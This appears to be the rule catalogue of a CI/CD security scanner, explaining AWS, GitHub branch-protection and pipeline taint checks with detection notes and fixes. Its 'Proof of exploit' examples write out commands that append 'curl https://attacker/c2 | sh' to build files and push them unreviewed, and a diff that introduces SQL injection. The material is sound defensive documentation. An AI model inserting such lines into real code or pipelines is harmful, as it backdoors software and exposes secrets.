Recommendation. Restrict CodeBuild security-group egress to the specific endpoints builds need (package registries, artifact repositories, STS). A wildcard egress rule lets a compromised build exfiltrate to anywhere on the internet.

Source: PBAC-003 in the AWS provider.

PBAC-005: CodePipeline stage action roles mirror the pipeline role HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. When stage actions don't set their own roleArn, they fall back to the pipeline-level role, which is the union of every stage's needs. A compromise of any one stage (typically the build, which runs untrusted code) gains the deploy stage's authority, including production deploy credentials. Per-action roles cap the radius.

Recommendation. Give each stage action (Source, Build, Deploy) its own narrowly-scoped IAM role via roleArn on the action declaration. Sharing the pipeline-level role means a compromise of one action (e.g. a build) gains the permissions the deploy stage also needs.

Source: PBAC-005 in the AWS provider.

S3-000: S3 API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: S3-000 in the AWS provider.

S3-001: Artifact bucket public access block not fully enabled CRITICAL

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.

Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.

Source: S3-001 in the AWS provider.

S3-002: Artifact bucket server-side encryption not configured HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).

Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.

Source: S3-002 in the AWS provider.

S3-003: Artifact bucket versioning not enabled MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable, the original bytes are gone.

Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.

Source: S3-003 in the AWS provider.

S3-004: Artifact bucket access logging not enabled LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. S3 server access logging records every API operation against the bucket, who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.

Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.

Source: S3-004 in the AWS provider.

S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or a SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.

Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.

Source: S3-005 in the AWS provider.

SCM-001: Default branch has no protection rule HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Without a branch protection rule on the default branch, anyone with write access can force-push, delete the branch, or merge directly without review. Even when CI runs on the branch, an unprotected default branch lets a single compromised maintainer rewrite history and erase the audit trail. The check is sourced from the GitHub REST API (GET /repos/{owner}/{repo}/branches/{branch}/protection); a 404 response is itself the failure signal.

Recommendation. Add a branch protection rule on the default branch in the repository's Settings -> Branches. At minimum require pull request reviews before merging, require status checks to pass, and disable force-pushes / deletions. Match the rule to OpenSSF Scorecard's Branch-Protection thresholds for the organization's compliance baseline.

Seen in the wild.

  • Numerous post-incident reports (PyPI / RubyGems package compromises 2018-2024) trace the initial maintainer-account takeover step to the absence of branch protection: the attacker pushed a single tampered commit to the default branch, the release pipeline ran on push, the malicious build shipped to the registry within minutes, and recovery required force-pushing the audit trail itself. Branch protection turns the entire class of attack into a review-then-merge gate.

Proof of exploit.

With no protection rule on main, a single compromised

maintainer credential is enough to ship a tampered build:

git checkout main

echo 'curl https://attacker/c2 | sh' >> Makefile

git commit -am 'fix: tweak'

git push origin main # no review required

# CI now runs the tampered build with full secret access.

Recovery needs force-push to rewrite the trail:

git push --force origin main # also unprotected

A protection rule with required_pull_request_reviews set

and allow_force_pushes: false blocks both the push and

the rewrite without giving up an inch of velocity.

Source: SCM-001 in the SCM provider.

SCM-002: Default branch protection does not require pull request reviews HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.required_approving_review_count from the branch protection payload. Fires when the field is absent (no review requirement at all) or when the count is 0. SCM-001 covers the case where no protection rule exists; this rule scopes specifically to the review-count knob inside an existing rule.

Recommendation. In the default-branch protection rule, enable Require a pull request before merging and set the minimum approving review count to at least 1 (Scorecard's threshold for Branch-Protection's middle tier; raise to 2 for higher trust). Combine with Dismiss stale pull request approvals when new commits are pushed so a force-push doesn't carry an old approval forward.

Known false positives.

  • required_pull_request_reviews.bypass_pull_request_allowances is covered by SCM-018: a protection rule that requires reviews but lists every contributor in the bypass allowlist still passes this rule even though the control is unenforced in practice. Read SCM-002 + SCM-018 as a pair when auditing whether required review actually fires.

Proof of exploit.

With protection but no required reviews, a maintainer can

self-approve a tampered change in two clicks:

git checkout -b release-fix

echo 'curl https://attacker/c2 | sh' >> deploy.sh

git commit -am 'fix: handle edge case'

git push origin release-fix

gh pr create --fill

gh pr merge --squash --auto # no second-set-of-eyes

# Release pipeline runs the tampered build with full

# production secrets in scope.

Setting required_approving_review_count to >= 1 forces

a separate identity to acknowledge the change before merge.

Source: SCM-002 in the SCM provider.

SCM-003: GitHub default code scanning is not enabled MEDIUM

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads state from the default code-scanning setup endpoint (GET /repos/{owner}/{repo}/code-scanning/default-setup). Fires when state is anything other than configured (not-configured, missing, or 404). This check only evaluates the default-setup endpoint. Repos running hand-authored CodeQL workflows or third-party SARIF uploads can still fail SCM-003; suppress per repo via ignore-file when that alternative coverage is intentional.

Recommendation. Enable default code scanning under the repository's Settings -> Code security -> Code scanning -> Default. The GitHub-managed CodeQL setup picks the right languages automatically and writes findings into the Code Scanning UI on every push and PR. Teams that already ship a CodeQL workflow can leave this rule's check off — but the default setup is the lowest-friction path for repos that don't have one.

Known false positives.

  • Repos that ship a hand-authored CodeQL workflow (or use Semgrep / Snyk / another SAST whose results land in the Code Scanning UI via SARIF upload) get the same coverage without enabling default setup. Suppress via ignore-file rather than removing the rule.

Proof of exploit.

Without code scanning, the only signal that a PR

introduces (e.g.) a SQL injection or hardcoded secret

comes from the human reviewer:

- def lookup(user_id):

- return db.query("SELECT * FROM u WHERE id = ?", user_id)

+ def lookup(user_id):

+ return db.query(f"SELECT * FROM u WHERE id = {user_id}")

A reviewer skimming a 400-line PR misses this. Default

CodeQL setup catches the same change as a CWE-89 finding

in the PR check, surfaces it inline in the diff, and

blocks the merge if the protection rule wires it up as

a required status check (see SCM-008).

Source: SCM-003 in the SCM provider.

SCM-004: GitHub secret scanning is not enabled HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads security_and_analysis.secret_scanning.status from the repo metadata payload. Fires when the value is anything other than enabled. Public repos get secret scanning free since 2023; private repos require a GitHub Advanced Security license. Without secret scanning, a credential committed even briefly is recoverable from git history indefinitely.

Recommendation. Enable secret scanning under the repository's Settings -> Code security -> Secret scanning. The GitHub-managed scanner covers ~200 token patterns from major providers and runs on every push. Pair with push protection so secrets are blocked at commit time rather than caught after the fact.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. The fix is to grant the token admin scope on the repo (or re-run with a personal token from a maintainer) rather than to suppress the rule.

Seen in the wild.

  • GitGuardian's annual State of Secrets Sprawl reports find millions of fresh credential leaks per year across public GitHub commits, with the median time-to-revocation measured in days. Native secret scanning alerts the maintainer within minutes of the push, collapsing the exploitable window from days to minutes for the patterns it covers.

Source: SCM-004 in the SCM provider.

SCM-005: Dependabot security updates are not enabled MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads security_and_analysis.dependabot_security_updates.status from the repo metadata payload. Fires when the value is anything other than enabled. Without security updates, the team has to discover and triage CVEs against their dependency graph manually — a delay measured in days or weeks even on attentive teams, vs hours when the bot opens the PR for them.

Recommendation. Enable Dependabot security updates under the repository's Settings -> Code security -> Dependabot. The bot opens a PR with the minimum-required upgrade for each open advisory against an in-use dependency. Pair with version-update config (.github/dependabot.yml) so routine bumps don't rely on the security-update path.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
  • Repos that delegate dependency-update PRs to Renovate, Snyk, or another bot get equivalent coverage without Dependabot. Suppress via ignore-file rather than removing the rule.

Source: SCM-005 in the SCM provider.

SCM-006: Default branch protection does not require signed commits MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads required_signatures.enabled from the branch protection payload. Fires when the field is missing or False. Required signatures don't validate signature authenticity (the GitHub web UI does that lazily on render), but a missing signature is rejected at push time, which blocks the most common compromise pattern: a stolen personal access token used to push under the maintainer's name without their signing key.

Recommendation. In the default-branch protection rule, enable Require signed commits. Configure GPG, SSH, or S/MIME signatures for every contributor's git client (git config commit.gpgsign true plus an uploaded public key). Pair with branch protection's Restrict who can push to matching branches so only signed commits from authorized identities land on the default branch.

Source: SCM-006 in the SCM provider.

SCM-007: Default branch protection allows force-pushes HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads allow_force_pushes.enabled from the branch protection payload. Fires when the value is True. The complementary deletion-protection knob is covered by SCM-009; this rule focuses on the rewrite-history attack class because force-push is the primitive every post-incident rewrite uses to clean up after itself.

Recommendation. In the default-branch protection rule, set Allow force pushes to Disabled. Force-pushes overwrite the audit trail; an attacker who lands a malicious commit can erase evidence of it after the fact. Also set Allow deletions to Disabled so the branch itself can't be wiped.

Source: SCM-007 in the SCM provider.

SCM-008: Default branch protection does not require status checks MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads required_status_checks.contexts (or the newer checks shape) from the branch protection payload. Fires when the field is missing or the contexts list is empty. Without required checks the merge gate degrades to human-only review; SCM-002 covers the review knob, this rule covers the automated-verification knob, and both should be on for high-trust default branches.

Recommendation. In the default-branch protection rule, enable Require status checks to pass before merging and list every check the team relies on (CI build, code scanning, secret scanning, lint). Set strict: true (Require branches to be up to date before merging) so a stale base doesn't land regressions the latest checks would catch.

Known false positives.

  • The restrictions block (users / teams / apps allowed to push directly to the protected branch) is not consulted today: a rule that requires status checks but lists every contributor in the push-restrictions allowlist still passes this rule even though those identities can land code without the checks running. Audit the allowlist in the GitHub UI when this rule passes on a high-trust repo.
  • Status-check names are matched as opaque strings; a configured required check that no workflow actually emits (typo, deleted job) will still pass this rule. The check would block the merge in practice (GitHub waits for the named context forever), but the misconfiguration itself isn't visible from the protection payload.

Source: SCM-008 in the SCM provider.

SCM-009: Default branch protection allows branch deletion HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads allow_deletions.enabled from the branch protection payload. Fires when the value is True. Pairs with SCM-007 (force-push allowed) — the two flags together cover the complete rewrite-history attack class.

Recommendation. In the default-branch protection rule, set Allow deletions to Disabled. A deleted default branch wipes every protection rule attached to it; an attacker with write access can delete the branch, recreate it from a tampered commit, and re-apply protection in a way that looks identical from the UI.

Source: SCM-009 in the SCM provider.

SCM-010: Branch protection allows administrators to bypass HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads enforce_admins.enabled from the branch protection payload. Fires when the value is False or the field is missing. Pairs with every other SCM-NNN rule that reads a branch-protection knob — without enforce_admins, those rules document intent rather than reality.

Recommendation. In the default-branch protection rule, enable Do not allow bypassing the above settings (a.k.a. Include administrators). Otherwise every other knob you set (required reviews, status checks, signed commits) becomes advisory rather than enforced. A compromised admin account is also a much shorter path to a tampered release than a compromised contributor account, so admins are exactly the identity the gate needs to apply to.

Source: SCM-010 in the SCM provider.

SCM-011: Default branch protection does not require CODEOWNERS reviews MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.require_code_owner_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 covers the bare review-count knob; this rule scopes specifically to whose review counts. The check evaluates only the protection-rule toggle; verifying that an actual CODEOWNERS file exists at .github/CODEOWNERS (and covers the right paths) is left to the recommendation, since the GitHub API surfaces the file's presence as a separate contents request the SCM provider does not fetch.

Recommendation. In the default-branch protection rule, enable Require review from Code Owners. Add a CODEOWNERS file at .github/CODEOWNERS (or docs/CODEOWNERS) mapping directories to the team or individual responsible. The GitHub UI auto-requests review from the matched owners on every PR that touches a covered path; combined with this branch-protection knob, the merge is blocked until they approve.

Known false positives.

  • Single-team repos where every contributor is a code owner of every path don't need the routing CODEOWNERS provides — but the protection knob still helps when a new team member joins. Suppress via ignore-file when the team intentionally stays flat.

Source: SCM-011 in the SCM provider.

SCM-012: Default branch protection keeps stale reviews after a push MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.dismiss_stale_reviews from the branch protection payload. Fires when the value is False or the field is missing. SCM-002 ensures a review is required at all; this rule ensures the approval the team relies on actually corresponds to the diff being merged.

Recommendation. In the default-branch protection rule, enable Dismiss stale pull request approvals when new commits are pushed. Approvals will be cleared every time the PR head moves; the reviewer has to re-approve the latest diff before merge, closing the time-of-check / time-of-use gap an attacker can exploit by amending the branch after approval.

Source: SCM-012 in the SCM provider.

SCM-013: Default branch protection does not require conversation resolution LOW

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_conversation_resolution.enabled from the branch protection payload. Fires when the value is False or the field is missing. Severity is LOW because the rule documents process discipline rather than a structural vulnerability — but unresolved security comments are a common upstream cause of incidents.

Recommendation. In the default-branch protection rule, enable Require conversation resolution before merging. PRs cannot land until every review comment is marked resolved. The friction is small (the PR author clicks Resolve after addressing) and the payoff is concrete: review comments can't be ignored to ship faster.

Source: SCM-013 in the SCM provider.

SCM-014: Default branch protection does not require approval of the most recent push MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.require_last_push_approval from the branch protection payload. Fires when the value is False or the field is missing. Pairs with SCM-012 (dismiss stale reviews) — both close the same approval-time-of-check / merge-time-of-use gap from different angles.

Recommendation. In the default-branch protection rule, enable Require approval of the most recent reviewable push. The reviewer and the most recent pusher must be different identities; an attacker controlling one collaborator account can no longer ship a malicious diff under another collaborator's approval.

Source: SCM-014 in the SCM provider.

SCM-015: Secret scanning push protection is not enabled HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reads security_and_analysis.secret_scanning_push_protection.status from the repo metadata payload. Fires when the value is anything other than enabled. Strongly paired with SCM-004 (secret scanning enabled): SCM-004 catches credentials after the push, SCM-015 stops them at the push. Both should be on for high-trust repos.

Recommendation. Enable secret scanning push protection under the repository's Settings -> Code security -> Push protection. Pushes containing matched credential patterns are refused by GitHub before the commit is accepted, so the credential never enters git history. Authors get an immediate remediation prompt; the bypass-with-justification flow preserves the audit trail when a legitimate test-case credential needs to land.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
  • Push protection covers the GitHub-managed pattern set (~200 token patterns from major providers). Custom-pattern support requires GitHub Advanced Security on private repos; public repos get the GitHub-managed set free.

Source: SCM-015 in the SCM provider.

SCM-016: Private vulnerability reporting is not enabled LOW

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Reads security_and_analysis.private_vulnerability_reporting.status from the repo metadata payload. Fires when the value is anything other than enabled. Severity is LOW because the rule documents process readiness rather than a structural vulnerability — but having no private reporting channel means the next external researcher's report is either a public issue or nothing.

Recommendation. Enable private vulnerability reporting under the repository's Settings -> Code security -> Private vulnerability reporting. Researchers get a private Security tab where they can submit details directly to maintainers; the maintainers can then triage, request a CVE, coordinate disclosure timing, and merge a fix without exposing the bug publicly until ready.

Known false positives.

  • When the scanning token lacks admin scope on the repo, the security_and_analysis block is omitted from the API response and this rule cannot tell disabled from unknown. Re-run with admin scope to confirm.
  • Repos that publish a SECURITY.md with an alternative out-of-band reporting channel (security@ mailbox, HackerOne / Bugcrowd program) cover the same control via a different mechanism. Suppress via ignore-file when the alternative is in place and documented.

Source: SCM-016 in the SCM provider.

SCM-017: Repository has no CODEOWNERS file MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Probes the three canonical CODEOWNERS locations via GET /repos/{owner}/{repo}/contents/<path>. Fires when none of the three returns a file response. Pairs with SCM-011 (the protection-rule toggle): SCM-011 covers intent, SCM-017 covers reality. A repo with both set is auditing the path-scoped review actually happens.

Recommendation. Add a CODEOWNERS file at .github/CODEOWNERS (the GitHub-recommended location), CODEOWNERS at the repo root, or docs/CODEOWNERS. Map directories to the team or individual responsible for them. With SCM-011's require_code_owner_reviews knob enabled, GitHub auto-requests review from the matched owners on every PR; without the file, the toggle is meaningless and any reviewer can approve any change.

Known false positives.

  • Single-team repos where every contributor is a code owner of every path may legitimately skip CODEOWNERS — the file adds no routing in that case. Suppress via ignore-file when the team intentionally stays flat. The same suppression applies to SCM-011.

Source: SCM-017 in the SCM provider.

SCM-018: Required PR reviews can be bypassed by named identities MEDIUM

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads required_pull_request_reviews.bypass_pull_request_allowances from the branch protection payload. Fires when any of users / teams / apps is non-empty. Surfaces the counts so the operator can locate the bypass entries in the GitHub UI without re-running the audit manually.

Recommendation. In the default-branch protection rule, clear Allow specified actors to bypass required pull requests (required_pull_request_reviews.bypass_pull_request_allowances in the API). Required reviews are only as strong as the bypass list. If a release-bot account needs to merge automated PRs, prefer a separate protection rule for the bot's branch namespace rather than a bypass entry on the default branch.

Seen in the wild.

  • Multiple GitHub Security Lab writeups attribute post-incident review-control gaps to legacy bypass entries: a contractor onboarded years earlier is listed in the allowance, a compromise of that contractor account merges tampered code despite the team having added required reviews on the default branch.

Source: SCM-018 in the SCM provider.

SCM-019: Push restrictions allowlist names individual users LOW

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms.

How this is detected. Reads restrictions.users from the branch protection payload. Fires when the list is non-empty. restrictions itself being absent is the default GitHub posture (no push allowlist; review gates govern access) and passes this rule. Teams and apps in restrictions are not flagged — the rule audits the personal-account subset specifically.

Recommendation. In the default-branch protection rule, audit the Restrict who can push to matching branches allowlist (restrictions in the API). Move each individual user into a GitHub team and add the team instead, or replace with a GitHub App / bot service account when the entry is an automation. Named user entries are personal-compromise vectors that bypass every PR-review gate on the branch.

Known false positives.

  • A break-glass admin account intentionally listed for incident response is a legitimate use case. Suppress via ignore-file once the account's access has been reviewed (MFA, hardware token, audit-logged use).

Source: SCM-019 in the SCM provider.

SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code-signing, LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.

Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.

Source: SIGN-001 in the AWS provider.

SIGN-002: AWS Signer profile is revoked or inactive HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).

Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced, lambdas relying on it will fail verification.

Source: SIGN-002 in the AWS provider.

SM-000: Secrets Manager API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: SM-000 in the AWS provider.

SM-001: Secrets Manager secret has no rotation configured HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Only secrets actually referenced by CodeBuild are checked, secrets used purely by application workloads are out of scope for a CI/CD scanner.

Recommendation. Enable automatic rotation on every Secrets Manager secret referenced by a CodeBuild project or CodePipeline. Unrotated secrets persist indefinitely, so a single leak (e.g. a build log that echoed the value) compromises the secret for its full lifetime.

Source: SM-001 in the AWS provider.

SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine with at least aws:SourceAccount or aws:PrincipalOrgID, the lift-and-shift cross-account secret-access pattern needs scoping.

Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.

Source: SM-002 in the AWS provider.

SSM-000: SSM Parameter Store API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: SSM-000 in the AWS provider.

SSM-001: SSM Parameter with secret-like name is not a SecureString HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. An SSM String parameter is plaintext at rest and at API; ssm:GetParameter without any KMS Decrypt authority returns the value. SecureString adds KMS-encryption + the WithDecryption=true flag (which forces an explicit KMS authorization step). Secret-named parameters (TOKEN, PASSWORD, KEY) are almost always intended to be SecureString and rarely should not be.

Recommendation. Recreate the parameter with Type=SecureString and migrate consumers to the new name if needed. Plain String parameters are visible via ssm:GetParameter without any KMS authorization.

Source: SSM-001 in the AWS provider.

SSM-002: SSM SecureString uses the default AWS-managed key MEDIUM

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. alias/aws/ssm is the AWS-managed default for SecureString. Its key policy is fixed and account-wide. A customer-managed key gives you the same per-parameter key-policy + CloudTrail audit story you'd apply to Secrets Manager (which always uses a CMK).

Recommendation. Recreate SecureString parameters with KeyId pointing at a customer-managed KMS key. The default alias/aws/ssm key is shared across the account and its key policy cannot be audited or scoped per parameter.

Source: SSM-002 in the AWS provider.

TAINT-001: Untrusted input flows across step boundaries via step outputs HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. GHA-003 detects the direct interpolation case (${{ github.event.* }} inside a run: body) and the single-step env-inheritance case. TAINT-001 fills the cross-step gap: a producer step sets a tainted step output, and a consumer step (in the same job) interpolates it via ${{ steps.<id>.outputs.<name> }}. The producer's interpolation is GHA-003's finding; TAINT-001's finding lives at the consumer (the actual injection sink) and carries the full chain in its description so a reader sees both sides at once.

v1 limitations: only same-job step outputs are tracked; jobs.<id>.outputs.* (cross-job propagation) and reusable-workflow input/output forwarding are tracked as future work in ROADMAP.md. The producer pass matches the canonical echo "name=..." >> $GITHUB_OUTPUT shape and the legacy ::set-output name=...:: workflow-command form.

Recommendation. Sanitise the value at the step that writes the $GITHUB_OUTPUT entry. The canonical pattern is to interpolate the untrusted source into an env: variable on the producer step and reference the env var in the echo: env: TITLE: ${{ github.event.issue.title }} then echo "title=$TITLE" >> $GITHUB_OUTPUT. After that, downstream steps reading steps.<id>.outputs.title see a string-typed value with no GitHub-expression evaluation pass left to exploit. Removing the source entirely is the safest fix; if the value genuinely needs to flow downstream, round-trip it through an env var the way GHA-003 recommends so the shell quoting still applies.

Known false positives.

  • If the producer step deliberately runs a sanitiser between the interpolation and the $GITHUB_OUTPUT write (echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' >> $GITHUB_OUTPUT), the consumer is no longer exploitable. The rule's regex doesn't model that transformation and will still fire; suppress via ignore-file scoped to the consumer step name when this is the deliberate shape. The producer's GHA-003 finding then carries the residual signal that the sanitiser is load-bearing.

Source: TAINT-001 in the GitHub Actions provider.

TAINT-002: Untrusted input flows across jobs via jobs.<id>.outputs: HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. TAINT-001 catches step-output flow within a single job; TAINT-002 catches the cross-job transition. Engine shape: walk every job's outputs: mapping looking for values that interpolate either a tainted step output or a direct ${{ github.event.* }} source. Tainted job outputs are matched against every ${{ needs.<job>.outputs.<name> }} reference in any downstream job's run: / with: body. Each match emits a TAINT-002 finding with the full chain in the description.

Same-step interpolations (the producer's own use of ${{ github.event.* }} inside its run:) are still GHA-003's responsibility; TAINT-002's value is the cross-job hop the single-step rule can't see.

Recommendation. Sanitise the value at the producer step before it lands in $GITHUB_OUTPUT. Once the value is in a job output the consuming job has no expression-level escaping pass left, ${{ needs.<job>.outputs.<name> }} substitutes the string verbatim into the consumer's shell. The canonical safe pattern is to copy the untrusted source into the producer step's env: block, reference the env var quoted in echo "name=$VAR" >> $GITHUB_OUTPUT, and only then surface it through the job output. The consuming job should still treat the value as tainted (use it in env-var form, not interpolated directly into shell).

Known false positives.

  • Sanitisation between the source interpolation and the $GITHUB_OUTPUT write isn't modeled. If the producer step runs echo "$TITLE" | tr -dc 'a-zA-Z0-9 ' before redirecting to GITHUB_OUTPUT, the consumer is no longer exploitable but TAINT-002 will still fire; suppress via ignore-file scoped to the consumer job's workflow file when this is the deliberate shape.

Source: TAINT-002 in the GitHub Actions provider.

TAINT-003: Untrusted input forwarded into reusable workflow with: HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection walks every jobs.<id>.uses: <callee> reference, finds every with: value that interpolates an attacker-controllable source (direct ${{ github.event.* }}, a tainted step output via ${{ steps.<id>.outputs.<name> }}, or a cross-job ${{ needs.<job>.outputs.<name> }}), and flags the forward.

When the callee body is loaded into the same scan (local ./.github/workflows/<file>.yml references via --gha-path, or remote refs fetched by --resolve-remote), the rule also checks whether the callee references ${{ inputs.<name> }} unquoted in a sink. Confirmed end-to-end paths get HIGH confidence; caller-side-only forward stay at MEDIUM (still a risk surface, but a future change to the callee could expose it).

Recommendation. Sanitise the value at the caller before forwarding it across the reusable-workflow boundary. The canonical safe pattern is to copy the untrusted source into a step's env: block, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), surface the sanitised result via echo "name=$VAR" >> $GITHUB_OUTPUT, then forward ${{ steps.<id>.outputs.<name> }} as the with: input. The callee then sees a string-typed value with no expression-evaluation pass left to exploit. If the callee is under your control, also handle the input via env in the callee's run: body (not direct ${{ inputs.<name> }} interpolation).

Known false positives.

  • Callees that wrap the input safely (immediately copy into env, sanitise before use) make the caller-side forward harmless. When the callee body is loaded into the scan, the rule downgrades to MEDIUM confidence on those paths; suppress via ignore-file when the callee's handling is audited and sound. Without --resolve-remote the rule can't see remote callee bodies and every forward stays at MEDIUM, the right default for unverifiable cross-repo flow.

Source: TAINT-003 in the GitHub Actions provider.

TAINT-004: Untrusted input flows across jobs via dotenv artifact HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Detection is a two-pass walk over the pipeline. Pass 1 looks for jobs whose scripts write KEY=value to a file declared under artifacts.reports.dotenv: and whose value interpolates an attacker-controllable GitLab predefined variable (the UNTRUSTED_VAR_RE vocabulary GL-002 already uses). Pass 2 walks every job with a needs: / dependencies: link to a producer and looks for $KEY references in scripts that match a tainted leak.

v1 limitations: extends: job-template inheritance and cross-pipeline include: are not yet tracked. The dotenv path matching is literal (./taint.env and taint.env are treated as the same path), no glob expansion is performed.

Recommendation. Sanitise the value at the producer job before it lands in the dotenv file. The canonical safe pattern is to copy the $CI_COMMIT_* / $CI_MERGE_REQUEST_* source into an intermediate shell variable, run a sanitiser (tr -dc 'a-zA-Z0-9 ' is enough for a freeform title), and only then write the cleaned value to dotenv. The consuming job should still treat the auto-imported variable as tainted, reference it quoted ("$TITLE") and never inline into a command without re-quoting. Removing the dotenv entirely is the strongest fix; if the value genuinely needs to flow downstream, validate the sanitiser is doing what you think before relying on it.

Known false positives.

  • If the producer job runs a sanitiser between the tainted source interpolation and the dotenv write (echo "$CI_COMMIT_TITLE" | tr -dc 'a-zA-Z0-9 ' > taint.env), the consumer is no longer exploitable but TAINT-004 still fires. Suppress via ignore-file scoped to the consumer job's pipeline file when this is the deliberate shape; the sanitiser is then load-bearing and any future regression in it would re-expose the consumer.

Source: TAINT-004 in the GitLab CI provider.

